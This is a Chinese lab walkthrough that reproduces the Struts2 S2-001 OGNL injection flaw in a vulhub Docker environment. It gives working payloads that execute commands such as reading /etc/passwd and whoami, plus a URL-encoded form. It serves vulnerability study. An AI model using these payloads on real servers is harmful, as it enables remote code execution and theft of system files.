一、漏洞描述:
该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行。
影响版本:
Struts 2.0.0 - Struts 2.0.8
二、环境搭建:
1、service docker start //开启docker服务
2、 cd /vulhub/struts2/ //进入Struts2目录下
3、cd s2-001 //进入s2-045漏洞环境
cat README.md //这里可以查看该漏洞的复现步骤
eog 1.png //查看图片,即burp的抓包。
4、docker-compose up -d //启动漏洞环境
三、漏洞复现
查看虚拟机ip,在浏览器访问192.168.197.128:8080
使用burp抓包然后在username插入payload ,可显示。
payload
获取tomcat执行路径:%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}
获取Web路径:
% {#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}
执行任意命令 :%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
备注:这个漏洞利用的payload需要url编码后才可执行。
这里有编译后的
%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22whoami%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
四、日志分析
docker exec -it 50be9937271f /bin/bash //进入s2-001的目录下 50be9937271f是我的s2-001的地址:可以使用docker ps 查 看自己对应地址
cd logs/ //日志文件都保存在这个文件里
cat localhost_access_log.2019-11-13 //这是是临时日志